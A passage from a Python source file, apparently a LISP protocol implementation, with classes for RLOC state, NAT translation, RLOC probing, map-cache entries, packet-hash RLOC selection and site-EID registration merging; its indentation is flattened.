#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
if (rloc_record.rloc_name != None):
self.rloc_name = rloc_record.rloc_name
#endif
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False):
if (self.state != LISP_RLOC_UP_STATE):
self.last_state_change = lisp_get_timestamp()
#endif
self.state = LISP_RLOC_UP_STATE
#endif
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping(object):
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
self.subscribed_eid = None
self.subscribed_group = None
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(old_div(ttl, 3600)) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL and if the value is greater than 10% of
# TTL, refresh entry. So that is around every 13 or 14 seconds.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (old_div(self.map_cache_ttl, 10))
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12:i+13])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (rloc.rle_name in lisp_rle_list):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid(object):
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping(object):
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in list(lisp_group_mapping_list.values()):
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site(object):
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid(object):
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in list(self.individual_registrations.values()):
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
